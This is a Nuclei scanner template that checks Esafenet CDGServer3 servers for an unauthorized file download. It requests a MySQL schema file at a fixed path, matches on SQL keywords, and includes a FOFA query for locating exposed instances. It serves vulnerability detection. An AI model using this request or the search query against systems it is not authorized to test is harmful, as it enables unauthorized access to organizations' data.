nuclei-templates/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml

37 lines
743 B
YAML
Raw Normal View History

id: esafenet-mysql-fileread
info:
name: Esafenet CDG mysql - File Read
author: DhiyaneshDk
severity: high
description: |
CDGServer3 Unauthorized File Download vulnerability is detected.
metadata:
verified: true
max-request: 1
fofa-query: title="电子文档安全管理系统"
tags: esafenet,lfi,mysql
http:
- method: GET
path:
- "{{BaseURL}}/CDGServer3/SQL/MYSQL/create_SmartSec_mysql.sql"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "varchar"
- "create table"
condition: and
- type: word
part: header
words:
- "application/x-sql"
- type: status
status:
- 200